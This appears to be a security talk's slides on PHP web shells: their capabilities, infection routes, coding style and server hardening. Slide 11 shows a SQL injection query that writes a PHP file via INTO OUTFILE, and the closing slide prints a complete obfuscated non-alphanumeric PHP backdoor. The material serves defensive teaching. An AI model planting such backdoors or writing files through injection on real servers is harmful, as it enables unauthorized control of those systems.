Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf
 
Mariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceXMariano G Tinti - Decoding SpaceX
Mariano G Tinti - Decoding SpaceX
 
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
“Building and Scaling AI Applications with the Nx AI Manager,” a Presentation...
 
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor...
 
Microsoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdfMicrosoft - Power Platform_G.Aspiotis.pdf
Microsoft - Power Platform_G.Aspiotis.pdf
 
Mind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AIMind map of terminologies used in context of Generative AI
Mind map of terminologies used in context of Generative AI
 
“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”“I’m still / I’m still / Chaining from the Block”
“I’m still / I’m still / Chaining from the Block”
 
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAUHCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
HCL Notes und Domino Lizenzkostenreduzierung in der Welt von DLAU
 
Artificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopmentArtificial Intelligence for XMLDevelopment
Artificial Intelligence for XMLDevelopment
 
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
GraphSummit Singapore | Graphing Success: Revolutionising Organisational Stru...
 
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
みなさんこんにちはこれ何文字まで入るの?40文字以下不可とか本当に意味わからないけどこれ限界文字数書いてないからマジでやばい文字数いけるんじゃないの?えこ...
 
Pushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 daysPushing the limits of ePRTC: 100ns holdover for 100 days
Pushing the limits of ePRTC: 100ns holdover for 100 days
 
National Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practicesNational Security Agency - NSA mobile device best practices
National Security Agency - NSA mobile device best practices
 
Removing Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software FuzzingRemoving Uninteresting Bytes in Software Fuzzing
Removing Uninteresting Bytes in Software Fuzzing
 
Best 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERPBest 20 SEO Techniques To Improve Website Visibility In SERP
Best 20 SEO Techniques To Improve Website Visibility In SERP
 
Climate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing DaysClimate Impact of Software Testing at Nordic Testing Days
Climate Impact of Software Testing at Nordic Testing Days
 
GenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizationsGenAI Pilot Implementation in the organizations
GenAI Pilot Implementation in the organizations
 
RESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for studentsRESUME BUILDER APPLICATION Project for students
RESUME BUILDER APPLICATION Project for students
 

Anatomy of PHP Shells

  • 1. Vedran Krivokuća, <vedran.krivokuca@nimium.hr> Ivan Špoljarić, <ivan.spoljaric@nimium.hr> Anatomy of PHP shell scripts
  • 2. A little about PHP shells in general
  • 3. ● Scripts written (mostly) in PHP*; ● Placed on a server (mostly under existing PHP sites) without authorization from server/web site owner; ● Used for "unauthorized maintenance" of the infected server; ● By the "unauthorized maintenance", we mean literally anything. What are PHP shell scripts?
  • 4. ● Running applications/scripts (with root privileges) ● "Piggybacking" on existing local exploits ● Modifying files ● Changing user passwords ● Enabling/disabling/reconfiguring system services ● Dumping, destroying and modifying databases ● Opening new backdoors to the system "Unauthorized maintenance"
  • 5. ● Surprisingly yes, C99shell and all of it's derivates seem to be most widespread PHP Shells out there. ● There are literally thousands of PHP shell scripts out there, quality varies. Are there "the best" PHP shells?
  • 6. Methods of infection by PHP shells
  • 7. ● Documentation for PHP, not the language itself, is a root of all evil. ● You don't believe it? This is how bad it is: Root Of All Evil
  • 8.
  • 9. How hard could this possibly be?
  • 10. ● But most of the responsibility is on the programmer. ● PHP team often does good job describing possible security pitfalls in their documentation Documented possible pitfalls
  • 11. ● attacks through standard filesystem functions which allow socket operations like fopen(), include(), require()...* ● attacks through unvalidated upload forms (not documented clearly enough, obviously...) ● in the worst case scenario, due to constellation of multiple bugs/vulnerabilities/weak setup, attacker might even use SQL injection to write files on your server! mysql> SELECT `injected_malicious_data` FROM `yourtable` INTO OUTFILE "file.php" Documented possible vulnerabilities
  • 12. ● Legend says there were infections with shell scripts through stolen FTP credentials. So, it's about time you change your "god", "sex" and "love" stuff. Also, change those "password" and "password123". In other words, your server's security is as strong as it is its weakest link. ● On shared hosting environments without proper user account isolation, it might not even be you who is infected but other shared hosting client. Consult hosting support in order to track down how you were attacked. Other methods of infection
  • 14. And now the interesting part... Let's take a peek at PHP shells code
  • 15. ● Rather clever, if not smart, architecture ● Written mostly in PHP, but can bring any exploiting code inside PHP source code in binary (compiled) form (mostly base64 encoded within variables) or even download needed exploits (source or binary) from 3rd party sites, compile and/or run them. ● If needed, can pull its own components from 3rd party sites. General architecture
  • 16. ● Decentralized development ● Resulting in many variations of all of PHP shells in the wild ● Code often complied to such development process, usually securing itself from redefining crucial components (if !function_exists())... prior to all important definitions) ● Can rely on 0-day exploits! Quick development cycle
  • 17. ● The scary part: it's a really short way from "plain PHP shell" to a full-blown bot script controlled through IRC Quick development cycle
  • 18. ● Not written by your know-just-a-little-coding regular PHP dev (no pun intended) ● You'll see what I mean... Coding style
  • 19. ● Well documented code: function mysql_query_parse($query, $output_type) { /* if output_type == 0, no output, if output_type == 1, no output if no error if output_type == 2, output without control-buttons if output_type == 3, output with control-buttons */ ... } Coding style
  • 20. ● Proper understanding and usage of variable scopes: function c99fsearch($d) { global $found; global $found_d; global $found_f; global $search_i_f; global $search_i_d; global $a; ... } Coding style
  • 21. ● It's usually safer code than many of the production PHP code in the wild: ● If it's a cross-platform shell, it performs checks before doing a function unavailable on other platform(s) ● Variables included in HTML output are escaped, so no easy path to unwanted XSS ● SQL query parameters are also escaped, no easy path to unwanted SQL injections Coding style
  • 22. ● Variable/function names obfuscation is done/not done in approximately 50:50 examples from our collected PHP shells ● External URLs, usernames, passwords are mostly always encoded using either base64 encoding or some kind of ascii-code-to-hex-codes conversion ● Obviously not for real protection but obfuscation against most obvious pattern-searching during attempts of detection* Coding style
  • 23. GUI
  • 24. ● Mostly quite ugly but always very efficient ● Sortable table outputs on every field ● You might be tempted to administer your server solely through PHP shell scripts. :-) GUI
  • 26. There are no shortcuts!
  • 27. These recommendations are best for hosters, but the developers are also invited to have them in mind! ● Whenever possible, chroot or go even further with isolation of different web sites on the same machine (containers/pseudo-virtualization/virtualization), limiting potential damage to just one site. ● Regulary update your server's OS – PHP shells (as we've learned) can bring along local exploits. ● Seriously consider complex password policies if you're running shared hosting environment. System preparation
  • 28. ● Disable potentially dangerous socket functionality of filesystem PHP functions if you don't need it (allow_url_fopen, allow_url_include in php.ini) if you're not sure – you don't need it ● When editing, keep in mind some systems (*cough*Debian*cough*) may have multiple php.ini files (one for mod_php, one for CLI, one for CGI...). Take care of them all. ● Follow usual security principles in server administration and maintenance. Global PHP configuration
  • 29. ● Consider further crippling PHP by disabling at least program execution PHP functions if you don't need them (through disable_functions). ● Which are those? http://www.php.net/manual/en/ref.exec.php ● Leave something enabled from program execution functions?* escapeshellarg(), escapeshellcmd() ● While on that subject – you can't disable eval() like this. :-) Global PHP configuration
  • 30. ● Always be checking uploaded files! (it is incredible how much code does not do any kind of checks) ● Keep in mind not to rely on $_FILES[…]['type']. Why? Follow good coding practices
  • 32. ● In general, checking for file extension could do you just well... If you don't end up only on that, use it as the primary defense measure. ● That might just not be enough sometimes. You might want to step-up this game: ● check for mime-type on server. On linux, you can use external FILE(1) utility. Assuming you haven't disabled program execution functions. ● We'll see how others do it later. Ok, how to check uploaded files?
  • 33. ● Always be sanitizing and validating inputs. PHP shells can be injected through various vectors: ● Apply programming techniques to eliminate possible SQL injections (escaping, parametrization...) ● Always be escaping shell commands you execute and their arguments. ● Always doublecheck on filenames of files (and their paths!) you handle from the code! Follow good coding practices
  • 34. How to others defend themselves? (three examples)
  • 35. ● As far as file uploads go, WordPress checks for uploaded media types by instancing them in respective modules (i. e. calls GD's getimagesize() on images) ● WordPress is generally very safe CMS. 3rd party plugins are usually the source of security issues and PHP shell infections. WordPress
  • 36. ● Puts no limitation itself on the uploaded content, since it is attached to e-mail messages and then deleted from temporary locations. ● Is it possible to attack remote e-mail clients like that? Depending on the destination client, it's possible. Not something Roundcube devs should and could focus on. Roundcube webmail
  • 37. ● Guesses the mime-type by extension, and you limit allowed mime-types for upload through configuration. ● You can enable upload of "dangerous file types" if you want. Dokuwiki
  • 38. Bonus slide What happens when frustrated Sendmail administrators write PHP shells? http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
  • 39. @$_[]=@!+_; $__=@${_}>>$_; $_[]=$__; $_[]=@_; $_[((++$__)+($__++ ))].=$_; $_[]=++$__; $_[]=$_[--$__][$__>>$__]; $_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__]; $_[$__+$__] = ($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] ); $_[$__+$__] .= ($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] ); $_[$__+$__] .= ($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ]; $_=$ $_[$__+ $__] ;$_[@-_]($_[@!+_]); #ep1cw1n